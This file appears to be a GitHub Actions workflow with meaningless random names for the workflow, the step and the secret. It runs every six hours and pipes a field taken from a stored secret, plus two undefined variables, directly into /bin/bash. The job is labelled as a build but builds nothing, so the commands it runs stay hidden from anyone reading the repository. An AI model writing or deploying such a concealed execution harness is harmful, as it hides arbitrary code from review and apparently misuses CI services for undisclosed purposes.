name: klkjdajk
on:
  workflow_dispatch:
  schedule:
    - cron: '37 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: klkjdajk
        env:
          sygob440: ${{ secrets.sygob440 }}
        run: |
          echo $sygob440 | jq -r .mfho9240 | /bin/bash
          echo $znop579 | jq -r .srd7 | /bin/bash
          echo $q24 | jq -r .vj7141 | /bin/bash

